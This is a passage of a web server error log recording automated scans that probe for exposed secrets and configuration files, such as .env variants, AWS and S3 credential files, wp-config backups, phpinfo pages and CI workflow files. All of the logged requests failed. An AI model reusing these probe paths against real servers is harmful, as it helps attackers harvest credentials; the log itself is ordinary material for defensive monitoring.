[error] 331#331: *5888 open() "/var/www/html/.env" failed (2: No such file or directory), client: 4.227.89.40, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "91.82.83.208.pool.invitel.hu" +2026/01/23 10:53:28 [error] 331#331: *5893 open() "/var/www/html/.env" failed (2: No such file or directory), client: 4.227.89.40, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/23 10:53:43 [error] 331#331: *5896 open() "/var/www/html/.env" failed (2: No such file or directory), client: 4.227.89.40, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/23 11:32:16 [error] 332#332: *7417 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/23 12:01:08 [error] 333#333: *7463 open() "/var/www/html/.env" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 12:01:08 [error] 333#333: *7464 open() "/var/www/html/api/.env" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /api/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 12:01:08 [error] 333#333: *7465 open() "/var/www/html/backend/.env" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /backend/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 12:01:09 [error] 333#333: *7466 open() "/var/www/html/admin/.env" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /admin/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 12:01:09 [error] 333#333: *7467 open() "/var/www/html/.env.example" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /.env.example HTTP/1.1", host: "91.82.83.208" +2026/01/23 12:01:10 [error] 333#333: *7468 open() "/var/www/html/app_dev.php/_profiler/phpinfo" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /app_dev.php/_profiler/phpinfo HTTP/1.1", host: "91.82.83.208" +2026/01/23 12:01:10 [error] 331#331: *7470 open() "/var/www/html/Media/.env" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /Media/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 12:01:10 [error] 331#331: *7471 open() "/var/www/html/Demo/.env" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /Demo/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 12:01:10 [error] 331#331: *7472 open() "/var/www/html/.ENV" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /.ENV HTTP/1.1", host: "91.82.83.208" +2026/01/23 12:01:10 [error] 331#331: *7473 open() "/var/www/html/items/.env" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /items/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 12:01:11 [error] 331#331: *7474 open() "/var/www/html/club/.env" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /club/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 12:01:11 [error] 331#331: *7475 open() "/var/www/html/.env~" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /.env~ HTTP/1.1", host: "91.82.83.208" +2026/01/23 12:01:11 [error] 331#331: *7476 open() "/var/www/html/owncloud/.env" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /owncloud/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 12:01:11 [error] 331#331: *7477 open() "/var/www/html/twilio/.env" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /twilio/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 12:01:11 [error] 331#331: *7478 open() "/var/www/html/products/.env" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /products/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 12:01:11 [error] 331#331: *7479 open() "/var/www/html/.env/.env-sample" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /.env/.env-sample HTTP/1.1", host: "91.82.83.208" +2026/01/23 12:01:11 [error] 331#331: *7480 open() "/var/www/html/info/phpinfo" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /info/phpinfo HTTP/1.1", host: "91.82.83.208" +2026/01/23 12:01:11 [error] 331#331: *7481 open() "/var/www/html/debug/default" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /debug/default HTTP/1.1", host: "91.82.83.208" +2026/01/23 12:01:11 [error] 331#331: *7482 open() "/var/www/html/.env1" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /.env1 HTTP/1.1", host: "91.82.83.208" +2026/01/23 12:01:12 [error] 331#331: *7483 open() "/var/www/html/config.env" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /config.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 12:01:12 [error] 331#331: *7484 open() "/var/www/html/laravel/public/.env" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /laravel/public/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 12:01:12 [error] 331#331: *7485 open() "/var/www/html/crm/.env.production" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /crm/.env.production HTTP/1.1", host: "91.82.83.208" +2026/01/23 12:01:12 [error] 330#330: *7486 open() "/var/www/html/docker-compose.yml" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /docker-compose.yml HTTP/1.1", host: "91.82.83.208" +2026/01/23 12:01:12 [error] 330#330: *7487 open() "/var/www/html/configuration.yaml" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /configuration.yaml HTTP/1.1", host: "91.82.83.208" +2026/01/23 12:01:12 [error] 330#330: *7488 open() "/var/www/html/api/phpinfo.php" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /api/phpinfo.php HTTP/1.1", host: "91.82.83.208" +2026/01/23 12:01:12 [error] 330#330: *7489 open() "/var/www/html/functions/.env" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /functions/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 12:01:13 [error] 330#330: *7490 open() "/var/www/html/admin/phpinfo" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /admin/phpinfo HTTP/1.1", host: "91.82.83.208" +2026/01/23 12:17:47 [error] 332#332: *10478 open() "/var/www/html/geoserver/wfs" failed (2: No such file or directory), client: 204.76.203.8, server: localhost-nginx-proxy-manager, request: "GET /geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0 HTTP/1.1", host: "91.82.83.208:80" +2026/01/23 12:46:17 [error] 330#330: *11993 open() "/var/www/html/robots.txt" failed (2: No such file or directory), client: 152.32.145.64, server: localhost-nginx-proxy-manager, request: "GET /robots.txt HTTP/1.1", host: "91.82.83.208:80" +2026/01/23 14:43:34 [error] 332#332: *12103 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/23 14:44:25 [error] 332#332: *12106 open() "/var/www/html/_next" failed (2: No such file or directory), client: 195.178.110.25, server: localhost-nginx-proxy-manager, request: "POST /_next HTTP/1.1", host: "91.82.83.208:80" +2026/01/23 14:44:25 [error] 332#332: *12107 open() "/var/www/html/api" failed (2: No such file or directory), client: 195.178.110.25, server: localhost-nginx-proxy-manager, request: "POST /api HTTP/1.1", host: "91.82.83.208:80" +2026/01/23 14:44:26 [error] 332#332: *12108 open() "/var/www/html/_next/server" failed (2: No such file or directory), client: 195.178.110.25, server: localhost-nginx-proxy-manager, request: "POST /_next/server HTTP/1.1", host: "91.82.83.208:80" +2026/01/23 14:44:26 [error] 332#332: *12109 open() "/var/www/html/app" failed (2: No such file or directory), client: 195.178.110.25, server: localhost-nginx-proxy-manager, request: "POST /app HTTP/1.1", host: "91.82.83.208:80" +2026/01/23 14:44:26 [error] 332#332: *12110 open() "/var/www/html/api/route" failed (2: No such file or directory), client: 195.178.110.25, server: localhost-nginx-proxy-manager, request: "POST /api/route HTTP/1.1", host: "91.82.83.208:80" +2026/01/23 15:14:48 [error] 333#333: *12169 open() "/var/www/html/_profiler/phpinfo" failed (2: No such file or directory), client: 195.178.110.162, server: localhost-nginx-proxy-manager, request: "GET /_profiler/phpinfo HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:31:34 [error] 330#330: *13680 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/23 15:32:23 [error] 330#330: *13681 "/var/www/html/bins/index.html" is not found (2: No such file or directory), client: 204.76.203.18, server: localhost-nginx-proxy-manager, request: "GET /bins/ HTTP/1.1", host: "91.82.83.208:80" +2026/01/23 15:51:47 [error] 332#332: *13700 open() "/var/www/html/.aws/credentials" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /.aws/credentials HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:51:50 [error] 332#332: *13702 open() "/var/www/html/.aws/credentials.gpg" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /.aws/credentials.gpg HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:51:54 [error] 332#332: *13706 open() "/var/www/html/.s3cfg" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /.s3cfg HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:51:57 [error] 332#332: *13708 open() "/var/www/html/.passwd-s3fs" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /.passwd-s3fs HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:52:00 [error] 332#332: *13710 open() "/var/www/html/s3cmd.ini" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /s3cmd.ini HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:52:04 [error] 332#332: *13712 open() "/var/www/html/.env" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:52:07 [error] 332#332: *13714 open() "/var/www/html/.env.backup" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /.env.backup HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:52:11 [error] 332#332: *13716 open() "/var/www/html/.env.bak" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /.env.bak HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:52:14 [error] 332#332: *13718 open() "/var/www/html/.env.config" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /.env.config HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:52:17 [error] 332#332: *13720 open() "/var/www/html/.env.dev" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /.env.dev HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:52:21 [error] 332#332: *13722 open() "/var/www/html/.env.live" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /.env.live HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:52:24 [error] 333#333: *13724 open() "/var/www/html/.env.local" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /.env.local HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:52:27 [error] 333#333: *13726 open() "/var/www/html/.env.old" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /.env.old HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:52:31 [error] 333#333: *13728 open() "/var/www/html/.env.prod" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /.env.prod HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:52:34 [error] 333#333: *13730 open() "/var/www/html/.env.production" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /.env.production HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:52:38 [error] 333#333: *13732 open() "/var/www/html/.env.save" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /.env.save HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:52:41 [error] 333#333: *13734 open() "/var/www/html/.env.staging" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /.env.staging HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:52:45 [error] 333#333: *13736 open() "/var/www/html/api/.env" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /api/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:52:48 [error] 333#333: *13738 open() "/var/www/html/apps/.env" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /apps/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:52:52 [error] 333#333: *13740 open() "/var/www/html/store/.env" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /store/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:52:55 [error] 333#333: *13742 open() "/var/www/html/blog/.env" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /blog/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:52:58 [error] 333#333: *13744 open() "/var/www/html/new/.env" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /new/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:53:02 [error] 333#333: *13746 open() "/var/www/html/old/.env" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /old/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:53:05 [error] 333#333: *13748 open() "/var/www/html/app/.env" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /app/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:53:09 [error] 333#333: *13750 open() "/var/www/html/public/.env" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /public/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:53:12 [error] 333#333: *13752 open() "/var/www/html/portal/.env" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /portal/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:53:15 [error] 333#333: *13754 open() "/var/www/html/application/.env" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /application/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:53:19 [error] 331#331: *13756 open() "/var/www/html/laravel/.env" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /laravel/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:53:22 [error] 331#331: *13758 open() "/var/www/html/laravel/.env" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /laravel/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:53:26 [error] 331#331: *13760 open() "/var/www/html/laravel/.env" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /laravel/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:53:29 [error] 331#331: *13762 open() "/var/www/html/laravel/.env" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /laravel/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:53:32 [error] 331#331: *13764 open() "/var/www/html/backend/.env" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /backend/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:53:36 [error] 331#331: *13766 open() "/var/www/html/admin/.env" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /admin/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:53:39 [error] 331#331: *13768 open() "/var/www/html/core/.env" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /core/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:53:43 [error] 331#331: *13770 open() "/var/www/html/config/.env" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /config/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:53:46 [error] 331#331: *13772 open() "/var/www/html/wp-config.php.bak" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /wp-config.php.bak HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:53:49 [error] 331#331: *13774 open() "/var/www/html/docker-compose.yml" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /docker-compose.yml HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:53:53 [error] 331#331: *13776 open() "/var/www/html/.github/workflows/build.yaml" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /.github/workflows/build.yaml HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:53:56 [error] 331#331: *13778 open() "/var/www/html/.github/workflows/build.yml" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /.github/workflows/build.yml HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:53:59 [error] 331#331: *13780 open() "/var/www/html/.github/workflows/ci.yaml" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /.github/workflows/ci.yaml HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:54:03 [error] 331#331: *13782 open() "/var/www/html/.github/workflows/ci.yml" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /.github/workflows/ci.yml HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:54:06 [error] 331#331: *13784 open() "/var/www/html/config/settings.yml" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /config/settings.yml HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:54:09 [error] 331#331: *13786 open() "/var/www/html/appsettings.json" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /appsettings.json HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:54:13 [error] 330#330: *13788 open() "/var/www/html/assets/credentials.json" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /assets/credentials.json HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:54:16 [error] 330#330: *13790 open() "/var/www/html/config/production.json" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /config/production.json HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:55:06 [error] 333#333: *31649 open() "/var/www/html/_profiler" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /_profiler HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:55:09 [error] 333#333: *31651 open() "/var/www/html/_profiler/phpinfo" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /_profiler/phpinfo HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:55:12 [error] 333#333: *31653 open() "/var/www/html/_profiler/phpinfo.php" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /_profiler/phpinfo.php HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:55:16 [error] 333#333: *31655 open() "/var/www/html/phpinfo.php" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /phpinfo.php HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:55:19 [error] 333#333: *31657 open() "/var/www/html/info.php" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /info.php HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:55:22 [error] 333#333: *31659 open() "/var/www/html/pinfo.php" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /pinfo.php HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:55:26 [error] 333#333: *31661 open() "/var/www/html/i.php" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /i.php HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:55:29 [error] 333#333: *31663 open() "/var/www/html/web/.env" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /web/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:55:33 [error] 333#333: *31667 open() "/var/www/html/crm/.env" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /crm/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:55:36 [error] 333#333: *31669 open() "/var/www/html/local/.env" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /local/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:55:39 [error] 333#333: *31671 open() "/var/www/html/prod/.env" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /prod/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:55:43 [error] 333#333: *31673 open() "/var/www/html/vendor/laravel/.env" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /vendor/laravel/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:55:46 [error] 333#333: *31675 open() "/var/www/html/vendor/.env" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /vendor/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:55:49 [error] 331#331: *31677 open() "/var/www/html/app/config/.env" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /app/config/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:55:53 [error] 331#331: *31679 open() "/var/www/html/core/app/.env" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /core/app/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:55:56 [error] 331#331: *31681 open() "/var/www/html/.git/info/exclude" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /.git/info/exclude HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:55:59 [error] 331#331: *31683 open() "/var/www/html/bitbucket-pipelines.yml" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /bitbucket-pipelines.yml HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:56:03 [error] 331#331: *31685 open() "/var/www/html/.gitlab-ci.yml" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /.gitlab-ci.yml HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:56:06 [error] 331#331: *31687 open() "/var/www/html/config/environments/development.rb" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /config/environments/development.rb HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:56:10 [error] 331#331: *31689 open() "/var/www/html/config/environments/production.rb" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /config/environments/production.rb HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:56:13 [error] 331#331: *31691 open() "/var/www/html/config/environments/staging.rb" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /config/environments/staging.rb HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:56:16 [error] 331#331: *31693 open() "/var/www/html/wp-content/w3tc-config/master-preview.php" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /wp-content/w3tc-config/master-preview.php HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:56:19 [error] 331#331: *31695 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 204.76.203.6, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/23 15:56:20 [error] 331#331: *31696 open() "/var/www/html/wp-content/w3tc-config/master.php" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /wp-content/w3tc-config/master.php HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:56:23 [error] 331#331: *31698 open() "/var/www/html/.shared/.env" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /.shared/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:56:26 [error] 331#331: *31700 open() "/var/www/html/system/.env" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /system/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:56:30 [error] 331#331: *31702 open() "/var/www/html/api/src/.env" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /api/src/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:56:33 [error] 331#331: *31704 open() "/var/www/html/.env_mail_server" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /.env_mail_server HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:56:37 [error] 331#331: *31706 open() "/var/www/html/project/.env" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /project/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:56:40 [error] 330#330: *31708 open() "/var/www/html/.env.development" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /.env.development HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:56:43 [error] 330#330: *31710 open() "/var/www/html/private/.env" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /private/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:56:47 [error] 330#330: *31712 open() "/var/www/html/user/.env.staging" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /user/.env.staging HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:56:50 [error] 330#330: *31714 open() "/var/www/html/doc/.env" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /doc/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:56:53 [error] 330#330: *31716 open() "/var/www/html/.env.stage" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /.env.stage HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:56:57 [error] 330#330: *31718 open() "/var/www/html/v1/.env" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /v1/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:57:00 [error] 330#330: *31720 open() "/var/www/html/dev/.env" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /dev/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:57:04 [error] 330#330: *31722 open() "/var/www/html/config/filesystems.php" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /config/filesystems.php HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:57:07 [error] 330#330: *31724 open() "/var/www/html/config/mail.php" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /config/mail.php HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:57:10 [error] 330#330: *31726 open() "/var/www/html/wp-config.php.orig" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /wp-config.php.orig HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:57:13 [error] 330#330: *31728 open() "/var/www/html/wp-config.php" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /wp-config.php HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:57:17 [error] 330#330: *31730 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /index.php HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:57:20 [error] 330#330: *31732 open() "/var/www/html/temp.php" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /temp.php HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:57:23 [error] 330#330: *31734 open() "/var/www/html/config/queue.php" failed (2: No such file or directory), client: 43.134.85.130, server: 